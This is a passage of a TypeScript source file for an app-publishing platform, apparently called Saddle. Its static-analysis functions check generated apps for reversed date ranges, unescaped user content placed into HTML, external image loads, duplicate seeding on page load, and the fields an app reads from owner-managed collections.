 * Not close/closes: beside an event's `date`, what closes is usually its sign-ups, a week
 * BEFORE the event — backwards by design. They still pair with opens/opensOn.
 */
const ENDS_A_DATE = new Set(['end', 'ends', 'until', 'to', 'expires', 'expiry', 'finish', 'finishes', 'last']);

/**
 * The fields of a row that hold the two ends of one range — `startsAt`/`endsAt`,
 * `startDate`/`endDate`, `validFrom`/`validUntil`, `firstDay`/`lastDay`, and a plain `date`
 * beside `endDate`, `expires`, `expiresOn` or `until`.
 *
 * Names are split into words so that only a whole word counts: `to` pairs with `from`, and
 * `photo` and `total` pair with nothing.
 */
function rangeFields(row: Record<string, unknown>): [string, string][] {
  const words = (name: string) =>
    name.replace(/([a-z0-9])([A-Z])/g, '$1 $2').toLowerCase().split(/[\s_-]+/).filter(Boolean);
  const slot = (name: string, set: Set<string>) => {
    const w = words(name);
    const hits = w.filter((x) => set.has(x));
    return hits.length === 1 ? w.map((x) => (set.has(x) ? '#' : x)).join(' ') : null;
  };
  const fields = Object.keys(row);
  const pairs: [string, string][] = [];
  for (const end of fields) {
    const endSlot = slot(end, RANGE_END);
    if (endSlot === null) continue;
    const endWord = words(end).find((x) => RANGE_END.has(x)) as string;
    // What the end word qualifies: `endDate` → 'date', `lastDay` → 'day', and nothing for a
    // bare `expires` or an `expiresOn`/`endsAt`, which end whatever the row's `date` starts.
    const rest = words(end).filter((x) => x !== endWord && x !== 'on' && x !== 'at').join(' ') || 'date';
    const start =
      fields.find((f) => f !== end && slot(f, RANGE_START) === endSlot) ??
      (ENDS_A_DATE.has(endWord) ? fields.find((f) => f !== end && words(f).join(' ') === rest) : undefined);
    if (start) pairs.push([start, end]);
  }
  return pairs;
}

/** A written-out date in milliseconds, read as written with no timezone applied, so that two
 *  of them compare as the wall-clock times they say. */
function wallClock(value: string): number | null {
  const m = /^(\d{4})-(\d{2})-(\d{2})(?:[T ](\d{2}):(\d{2}))?/.exec(value.trim());
  return m ? Date.UTC(+m[1], +m[2] - 1, +m[3], +(m[4] ?? 0), +(m[5] ?? 0)) : null;
}

/**
 * Whether a range's end lands before its start: 'absolute' for written-out dates, 'relative'
 * for tokens that can land that way on some publish day, or null when it runs forwards or
 * cannot be judged (clock times alone, a pair with one date of each kind, anything else).
 */
function endsBeforeStart(start: string, end: string): 'absolute' | 'relative' | null {
  if (DATE_TOKEN.test(start.trim()) && DATE_TOKEN.test(end.trim())) {
    /*
     * A token with no clock ('+2d', '+1w sat') names a DAY, as a written-out date alone does
     * below. It resolves to the publish moment's own clock on that day, so published at 23:30
     * '+2d' lands after '+2d 21:00' — a row that ends at 21:00 on the day it starts, read as
     * backwards. Such pairs are compared by day.
     */
    const clockless = (v: string) => {
      const m = DATE_TOKEN.exec(v.trim());
      return !!m && m[4] === undefined && m[2].toLowerCase() !== 'h';
    };
    const byDay = clockless(start) || clockless(end);
    const at = (d: Date) => (byDay ? new Date(d.getFullYear(), d.getMonth(), d.getDate()).getTime() : d.getTime());
    // 4 Jan 2026 is a Sunday, so these seven days are every day of the week; each is tried
    // just after midnight and just before it, because an hours token ('+3h') crosses days.
    for (let day = 0; day < 7; day++) {
      for (const [h, min] of [[0, 30], [12, 0], [23, 30]]) {
        const now = new Date(2026, 0, 4 + day, h, min);
        const a = resolveDateToken(start, now);
        const b = resolveDateToken(end, now);
        if (a && b && at(b) < at(a)) return 'relative';
      }
    }
    return null;
  }
  const sa = dateShapeOf(start);
  const sb = dateShapeOf(end);
  if (!sa || !sb || sa === 'time' || sb === 'time') return null;
  // A date alone means the whole of that day, so an event ending "2027-06-11" after starting
  // at 18:00 that day runs forwards. Compare days whenever either side has no clock.
  if (sa === 'date' || sb === 'date') {
    return end.trim().slice(0, 10) < start.trim().slice(0, 10) ? 'absolute' : null;
  }
  // A zoned instant beside a zoneless time is only comparable to within a timezone, so the
  // pair must be out of order by more than the widest offset there is (14 hours) to count.
  const read = (v: string, shape: string) => (shape === 'instant' ? Date.parse(v) : wallClock(v));
  const a = read(start, sa);
  const b = read(end, sb);
  if (a === null || b === null || Number.isNaN(a) || Number.isNaN(b)) return null;
  const slack = sa === sb ? 0 : 14 * 3600_000;
  return b < a - slack ? 'absolute' : null;
}

/**
 * Collections the app READS but never writes — `S.list('shifts')`.
 *
 * These are the owner's content: a rota, a timetable, a class list. The page can only read
 * them; the owner edits them in Saddle and every visitor sees the change without the app
 * being republished. Declared `ownerWrite` server-side, which is anonymous-read and
 * owner-only-write.
 */
/**
 * The starting rows an app declares for an owner-managed collection —
 * `S.list('nights', [ … ])`.
 *
 * Only a literal array counts, and only literal rows inside it. Anything computed is
 * unreadable here by definition, and guessing would mean publishing rows nobody wrote.
 */
export function listStartingRows(appCode: string): Record<string, Record<string, unknown>[]> {
  const out: Record<string, Record<string, unknown>[]> = {};

  /**
   * UNREADABLE is not the same as absent, and conflating them shipped a real bug.
   *
   * A generated timetable wrote `{ startsAt: daysFromNow(1, 9, 0) }` — right at runtime,
   * unreadable here. The first version dropped just that property and kept the row, so
   * every session would have been published with no date, and the app showed five classes
   * each saying "No upcoming sessions". A row we cannot read whole is a row we must not
   * publish, so it is marked and reported instead.
   */
  const UNREADABLE = Symbol('unreadable');

  const literal = (node: Node | undefined): unknown => {
    const n = node as { type?: string; value?: unknown; properties?: Node[]; elements?: Node[]; key?: Node } | undefined;
    if (!n) return UNREADABLE;
    if (n.type === 'Literal') return n.value;
    if (n.type === 'ArrayExpression') return (n.elements ?? []).map((e) => literal(e));
    if (n.type === 'ObjectExpression') {
      const row: Record<string, unknown> = {};
      for (const prop of n.properties ?? []) {
        const pr = prop as unknown as { key?: { name?: string; value?: unknown }; value?: Node };
        const key = pr.key?.name ?? (typeof pr.key?.value === 'string' ? pr.key.value : undefined);
        if (!key) return UNREADABLE;
        const val = literal(pr.value);
        if (val === UNREADABLE) return UNREADABLE;
        row[key] = val;
      }
      return Object.keys(row).length ? row : UNREADABLE;
    }
    return UNREADABLE;
  };

  for (const script of extractScripts(appCode)) {
    let program: Node;
    try {
      program = parse(script.code, { ecmaVersion: 2022 }) as unknown as Node;
    } catch {
      continue;
    }
    walk(program, (n) => {
      if (!isSaddleCall(n, 'list')) return;
      const args = (n.arguments as Node[] | undefined) ?? [];
      const entity = (args[0] as { value?: unknown } | undefined)?.value;
      if (typeof entity !== 'string' || !entity) return;
      const rows = literal(args[1]);
      if (Array.isArray(rows)) {
        // Only whole rows. A partially readable one is dropped, and the gate says so.
        out[entity] = rows.filter(
          (r): r is Record<string, unknown> => !!r && typeof r === 'object' && !Array.isArray(r),
        );
      }
    });
  }

  return out;
}

/**
 * Row fields dropped into markup without `S.esc`. SEC-03.
 *
 * The danger is content one person typed appearing in another person's browser. An owner
 * writes a class description; every visitor's page renders it. A visitor types a name; the
 * owner's list renders it. If that goes into `innerHTML` raw, an `<img onerror=…>` runs as
 * the reader — and since every published app shares one origin, it runs next to the
 * reader's session.
 *
 * WHY THIS IS SO NARROW. The obvious rule — "flag any non-literal interpolated into
 * markup" — was measured against the corpus first and found 82 hits across seven apps, of
 * which almost none were unsafe: `busy ? 'disabled' : ''`, `val === true`, `left`,
 * `pct * 100`, `c.id`, `full ? '<span…>' : '<span…>'`. A rejecting rule that fires on all
 * of those would fail every build and, because stored apps recompile, brick the fleet.
 *
 * So this only reports a property read on a variable PROVABLY holding rows from
 * `S.list`/`S.cloud` — content from outside the app's own source. It is deliberately
 * conservative: it will miss an indirect path, and it will not cry wolf. An operand that is
 * already `S.esc(row.name)` is a call expression, so it is skipped for free.
 */
/**
 * Images the page would load from somebody else's server.
 *
 * Only the positions that make a browser actually FETCH an image: `<img src>`, `srcset`,
 * `poster`, a CSS `background`/`background-image` url(), and a favicon link. Deliberately
 * not `<a href>` (a person navigating), not `og:image` (a crawler fetches that one
 * server-side, and it is genuinely useful pointing anywhere), and not a URL sitting in a
 * string somewhere — the point is the load, not the mention.
 *
 * Our own origins are not external: the published page, the asset bucket a generated or
 * uploaded image lands in, and the CloudFront distribution in front of them.
 */
export function externalImageUrls(appCode: string): { line: number; text: string; url: string }[] {
  const OURS = /^https?:\/\/(app\.saddle-sites\.com|[^/]*\.s3\.[^/]*\.amazonaws\.com|[^/]*\.cloudfront\.net)/i;
  const PATTERNS = [
    /<img[^>]+src\s*=\s*["']?(https?:\/\/[^"'\s>]+)/gi,
    /\bsrcset\s*=\s*["'][^"']*?(https?:\/\/[^"'\s,]+)/gi,
    /\bposter\s*=\s*["']?(https?:\/\/[^"'\s>]+)/gi,
    /background(?:-image)?\s*:[^;"']*url\(\s*["']?(https?:\/\/[^"')]+)/gi,
    /<link[^>]+rel\s*=\s*["']?(?:shortcut )?icon["']?[^>]*href\s*=\s*["']?(https?:\/\/[^"'\s>]+)/gi,
  ];

  const out: { line: number; text: string; url: string }[] = [];
  appCode.split('\n').forEach((line, i) => {
    for (const re of PATTERNS) {
      for (const m of line.matchAll(re)) {
        const url = m[m.length - 1];
        if (OURS.test(url)) continue;
        out.push({ line: i + 1, text: line.trim().slice(0, 120), url });
      }
    }
  });
  return out;
}

/**
 * Starter rows written on every page load, by a guard that cannot work.
 *
 * `if (notes.all().length === 0) { notes.add(...) }` looks exactly right and is true every
 * single time the page opens: `all()` reads a cache that starts empty while the first fetch
 * is still in flight, so an unloaded collection is indistinguishable from an empty one.
 * Measured on a live app — three consecutive loads in one signed-in session, twelve POSTs
 * each time. Its owner opens their bookmark five times and holds sixty entries they never
 * wrote. Under throttling it is worse than duplication: twelve simultaneous writes against
 * a Lambda concurrency of 10 landed nine and failed three, so the copies are not even
 * consistent.
 *
 * MEASURED BEFORE THIS RULE WAS WRITTEN: 74 live pages, 10 using `S.cloud`, 1 refused — and
 * that one, `ammiya`, is a TRUE positive I first mistook for a false one. It carries three
 * guards: a `seeded` flag, a signed-in check, and the empty check. The flag is page-scoped,
 * so it resets on every load; the signed-in check passes because the person IS signed in;
 * and the empty check reads the unloaded cache. Three correct-looking guards, all useless.
 * That is the clearest evidence that this was never the model's mistake — the guidance said
 * "seed only into an empty collection" and `S.cloud` could not express it until `.seed()`
 * existed.
 *
 * Deliberately silent on `S.store`, which is safe by construction (the runtime seeds only
 * when the key is absent), on an empty check used to RENDER an empty state, and on
 * `.seed(rows)` itself.
 */
export function reseedsOnEveryLoad(appCode: string): { collection: string; text: string }[] {
  const cloudVars = [...appCode.matchAll(/(?:var|let|const)\s+(\w+)\s*=\s*S\.cloud\(\s*(['"])([^'"]+)\2/g)]
    .map((m) => ({ variable: m[1], collection: m[3] }));
  if (!cloudVars.length) return [];

  const out: { collection: string; text: string }[] = [];
  for (const { variable, collection } of cloudVars) {
    const checks = [
      new RegExp(`${variable}\\.all\\(\\)\\.length\\s*[<=!>]`, 'g'),
      new RegExp(`!\\s*${variable}\\.all\\(\\)\\.length`, 'g'),
    ];
    for (const re of checks) {
      let flagged = false;
      for (const m of appCode.matchAll(re)) {
        // A write to the SAME collection reachable from that check.
        const after = appCode.slice(m.index ?? 0, (m.index ?? 0) + 900);
        if (!new RegExp(`${variable}\\.add\\s*\\(`).test(after)) continue;
        out.push({
          collection,
          text: appCode.slice(m.index ?? 0, (m.index ?? 0) + 70).replace(/\s+/g, ' '),
        });
        flagged = true;
        break;
      }
      if (flagged) break;
    }
  }
  return out;
}

export function unescapedRowReads(appCode: string): { line: number; text: string; field: string }[] {
  // Server-written or app-assigned, never typed by a person.
  const SAFE_FIELDS = new Set(['id', 'createdAt', 'updatedAt', 'ownerId']);
  const out: { line: number; text: string; field: string }[] = [];

  for (const script of extractScripts(appCode)) {
    let program: Node;
    try {
      program = parse(script.code, { ecmaVersion: 2022, locations: true }) as unknown as Node;
    } catch {
      continue;
    }

    // `var nights = S.list('nights')` — the HANDLE, not a row.
    const handles = new Set<string>();
    walk(program, (n) => {
      if (n.type !== 'VariableDeclarator') return;
      const id = n.id as { type?: string; name?: string } | undefined;
      const init = n.init as Node | undefined;
      if (id?.type !== 'Identifier' || !id.name || !init) return;
      if (isSaddleCall(init, 'list') || isSaddleCall(init, 'cloud')) handles.add(id.name);
    });
    if (!handles.size) continue;

    const startsAtHandle = (node: Node | undefined): boolean => {
      let hit = false;
      walk(node, (inner) => {
        if (inner.type === 'Identifier' && handles.has((inner as { name?: string }).name ?? '')) hit = true;
      });
      return hit;
    };

    /*
     * Which variables hold a row.
     *
     * Two shapes, both unambiguous: the parameter of a callback run over a collection
     * (`nights.all().map(function (n) { … })`), and a variable assigned straight from a
     * lookup (`var night = nights.get(id)`). Anything less direct is left alone on purpose.
     */
    const rowVars = new Set<string>();
    walk(program, (n) => {
      if (n.type === 'CallExpression') {
        const callee = n.callee as Node | undefined;
        if (callee?.type === 'MemberExpression' && startsAtHandle(callee.object as Node)) {
          for (const arg of ((n.arguments as Node[] | undefined) ?? [])) {
            if (arg?.type !== 'FunctionExpression' && arg?.type !== 'ArrowFunctionExpression') continue;
            const first = ((arg.params as Node[] | undefined) ?? [])[0] as { type?: string; name?: string } | undefined;
            if (first?.type === 'Identifier' && first.name) rowVars.add(first.name);
          }
        }
      }
      if (n.type === 'VariableDeclarator') {
        const id = n.id as { type?: string; name?: string } | undefined;
        const init = n.init as Node | undefined;
        if (id?.type !== 'Identifier' || !id.name || !init || init.type !== 'CallExpression') return;
        const callee = init.callee as { type?: string; property?: { name?: string }; object?: Node } | undefined;
        if (callee?.type !== 'MemberExpression') return;
        if (callee.property?.name !== 'get') return;
        if (startsAtHandle(callee.object as Node)) rowVars.add(id.name);
      }
    });
    if (!rowVars.size) continue;

    // Flatten `a + b + c` so a five-part template is judged as one expression.
    const operands = (n: Node, acc: Node[] = []): Node[] => {
      if (n.type === 'BinaryExpression' && (n as { operator?: string }).operator === '+') {
        operands(n.left as Node, acc);
        operands(n.right as Node, acc);
      } else acc.push(n);
      return acc;
    };

    const seen = new Set<number>();
    walk(program, (n) => {
      if (n.type !== 'BinaryExpression' || (n as { operator?: string }).operator !== '+') return;
      const parts = operands(n);
      // Markup, rather than any old concatenation: a literal with a tag in it.
      const buildsMarkup = parts.some(
        (p) => p.type === 'Literal' && typeof (p as { value?: unknown }).value === 'string'
          && /[<>]/.test(String((p as { value?: unknown }).value)),
      );
      if (!buildsMarkup) return;

      for (const p of parts) {
        if (p.type !== 'MemberExpression' || (p as { computed?: boolean }).computed) continue;
        const obj = p.object as { type?: string; name?: string } | undefined;
        const prop = p.property as { name?: string } | undefined;
        if (obj?.type !== 'Identifier' || !obj.name || !prop?.name) continue;
        if (!rowVars.has(obj.name) || SAFE_FIELDS.has(prop.name)) continue;

        const at = (p as { start?: number }).start ?? 0;
        if (seen.has(at)) continue;
        seen.add(at);
        const line = ((p as { loc?: { start?: { line: number } } }).loc?.start?.line ?? 1) + script.startLine - 1;
        out.push({ line, text: `${obj.name}.${prop.name}`, field: prop.name });
      }
    });
  }

  return out;
}

export function listCalls(appCode: string): string[] {
  const names = new Set<string>();

  for (const script of extractScripts(appCode)) {
    let program: Node;
    try {
      program = parse(script.code, { ecmaVersion: 2022 }) as unknown as Node;
    } catch {
      continue;
    }
    walk(program, (n) => {
      if (!isSaddleCall(n, 'list')) return;
      const entity = ((n.arguments as Node[] | undefined)?.[0] as { value?: unknown } | undefined)?.value;
      if (typeof entity === 'string' && entity) names.add(entity);
    });
  }

  return [...names];
}

/**
 * The fields an app READS off an `S.list` collection.
 *
 * The owner fills these rows in themselves, and until now had no way to know what the app
 * expected: an app reading `session.limit` while the owner typed `places` shows "0 places
 * left" for every session, with nothing on either side saying why. The app is the only
 * thing that knows its own shape, so the shape is read out of it.
 *
 * Found the same way `cloudCalls` finds written fields: track the variable the collection
 * was assigned to, then collect every property read off a row of it.
 */
export function listFields(appCode: string): Record<string, string[]> {
  const byVar = new Map<string, string>();
  const fields = new Map<string, Set<string>>();

  for (const script of extractScripts(appCode)) {
    let program: Node;
    try {
      program = parse(script.code, { ecmaVersion: 2022 }) as unknown as Node;
    } catch {
      continue;
    }

    // `var sessions = S.list('sessions')`
    walk(program, (n) => {
      if (n.type !== 'VariableDeclarator') return;
      const id = n.id as { type?: string; name?: string } | undefined;
      const init = n.init as Node | undefined;
      if (id?.type !== 'Identifier' || !id.name || !init || !isSaddleCall(init, 'list')) return;
      const entity = ((init.arguments as Node[] | undefined)?.[0] as { value?: unknown } | undefined)?.value;
      if (typeof entity !== 'string') return;
      byVar.set(id.name, entity);
      if (!fields.has(entity)) fields.set(entity, new Set());
    });

    if (byVar.size === 0) continue;

    /*
     * Which collection each callback's row parameter belongs to.
     *
     * `sessions.all().filter(function (s) { … })` — the rows of `sessions` arrive as `s`,
     * so every property read on `s` is a field of a session and not of a class. Without
     * this an app with two collections offers the owner both sets of columns for each,
     * which is how a class ends up being offered a "limit".
     */
    const rowVarOf = new Map<string, string>();

    // `var todays = sessions.all().filter(...)` / `var first = rows.all()[0]` — a variable
    // derived from a collection holds that collection's rows, so reads on it are its
    // fields. Without this, only callback parameters count and an app that pulls its rows
    // into a local first tells us nothing.
    // Repeated because the chain has links: `var upcoming = shifts.all()` then
    // `var first = upcoming[0]`. One pass would stop at the first hop and lose the row.
    for (let pass = 0; pass < 3; pass++) {
      walk(program, (n) => {
        if (n.type !== 'VariableDeclarator') return;
        const id = n.id as { type?: string; name?: string } | undefined;
        const init = n.init as Node | undefined;
        if (id?.type !== 'Identifier' || !id.name || !init) return;
        if (byVar.has(id.name) || rowVarOf.has(id.name)) return; // already known
        let from: string | undefined;
        walk(init, (inner) => {
          if (inner.type !== 'Identifier') return;
          const name = (inner as { name?: string }).name ?? '';
          if (byVar.has(name)) from = byVar.get(name);
          else if (rowVarOf.has(name)) from = rowVarOf.get(name);
        });
        if (from) rowVarOf.set(id.name, from);
      });
    }

    walk(program, (n) => {
      if (n.type !== 'CallExpression') return;
      const callee = n.callee as Node | undefined;
      if (callee?.type !== 'MemberExpression') return;

      // The collection this call chain started from, if any.
      let owner: string | undefined;
      walk(callee.object as Node, (inner) => {
        if (inner.type === 'Identifier' && byVar.has((inner as { name?: string }).name ?? '')) {
          owner = byVar.get((inner as { name?: string }).name!);
        }
      });
      if (!owner) return;

      for (const arg of ((n.arguments as Node[] | undefined) ?? [])) {
        if (arg?.type !== 'FunctionExpression' && arg?.type !== 'ArrowFunctionExpression') continue;
        const params = (arg.params as Node[] | undefined) ?? [];
        const first = params[0] as { type?: string; name?: string } | undefined;
        if (first?.type === 'Identifier' && first.name) rowVarOf.set(first.name, owner);
      }
    });

    // Rows come out of `.all()` / `.get()` and are read inside callbacks, so the row
    // variable is whatever the app named its parameter. Collect every property read on any
    // identifier that is not the collection handle itself, once a collection exists —
    // over-inclusive on purpose: offering the owner a column the app ignores costs a row
    // of the form, while missing one costs a broken app.
    const rowProps = new Map<string, Set<string>>();

    // Every member expression that is CALLED is a method, not a field — which is the
    // whole distinction. Collected first so the reader below can skip them.
    const called = new Set<Node>();
    walk(program, (n) => {
      if (n.type !== 'CallExpression') return;
      const callee = n.callee as Node | undefined;
      if (callee?.type === 'MemberExpression') called.add(callee);
    });

    // Names that belong to the platform rather than to a row. Without these an owner is
    // offered "message" and "status" as columns of their timetable.
    const NOT_FIELDS = new Set([
      'length', 'style', 'classList', 'dataset', 'value', 'textContent', 'innerHTML', 'innerText',
      'checked', 'disabled', 'message', 'status', 'ok', 'target', 'currentTarget', 'preventDefault',
      'parentNode', 'children', 'files', 'result', 'prototype', 'constructor',
    ]);

    walk(program, (n) => {
      if (n.type !== 'MemberExpression' || (n as { computed?: boolean }).computed) return;
      if (called.has(n)) return;            // a method call, not a field
      const obj = n.object as { type?: string; name?: string } | undefined;
      const prop = n.property as { name?: string } | undefined;
      if (obj?.type !== 'Identifier' || !obj.name || !prop?.name) return;
      if (obj.name === 'S' || obj.name === 'window' || obj.name === 'document' || obj.name === 'Math' || obj.name === 'Object' || obj.name === 'JSON') return;
      if (byVar.has(obj.name)) return;      // the collection handle, not a row
      if (NOT_FIELDS.has(prop.name)) return;

      const owner = rowVarOf.get(obj.name);
      if (owner) { fields.get(owner)!.add(prop.name); return; }
      // Unattributable for now — kept with the variable it was read from, so the fallback
      // below can tell a row parameter from the app's own state.
      if (!rowProps.has(obj.name)) rowProps.set(obj.name, new Set());
      rowProps.get(obj.name)!.add(prop.name);
    });

    // Reads that could not be traced to one collection go to it, but ONLY when there is a
    // single collection to be wrong about AND the read was on a function PARAMETER — the
    // shape a row arrives in. Without that second condition an app's own state objects
    // leak in, and an owner posting a shift is offered "password" as a column.
    if (byVar.size === 1) {
      const params = new Set<string>();
      walk(program, (n) => {
        if (n.type !== 'FunctionExpression' && n.type !== 'ArrowFunctionExpression' && n.type !== 'FunctionDeclaration') return;
        for (const p of ((n.params as Node[] | undefined) ?? [])) {
          const id = p as { type?: string; name?: string };
          if (id?.type === 'Identifier' && id.name) params.add(id.name);
        }
      });

      const only = [...byVar.values()][0];
      for (const [name, props] of rowProps) {
        if (!params.has(name)) continue;
        for (const p of props) fields.get(only)!.add(p);
      }
    }
  }

  const out: Record<string, string[]> = {};
  for (const [entity, set] of fields) out[entity] = [...set].filter((f) => f !== 'id');
  return out;
}

/** Collections the app reads COUNTS of — `S.seats('bookings')`. Always the same collection
 *  the app submits into, so this only records that the app needs the counts endpoint. */
export function seatsCalls(appCode: string): string[] {
  const names = new Set<string>();

  for (const script of extractScripts(appCode)) {
    let program: Node;
    try {
      program = parse(script.code, { ecmaVersion: 2022 }) as unknown as Node;
    } catch {
      continue;
    }
    walk(program, (n) => {
      if (!isSaddleCall(n, 'seats')) return;
      const entity = ((n.arguments as Node[] | undefined)?.[0] as { value?: unknown } | undefined)?.value;
      if (typeof entity === 'string' && entity) names.add(entity);
    });
  }

  return [...names];
}
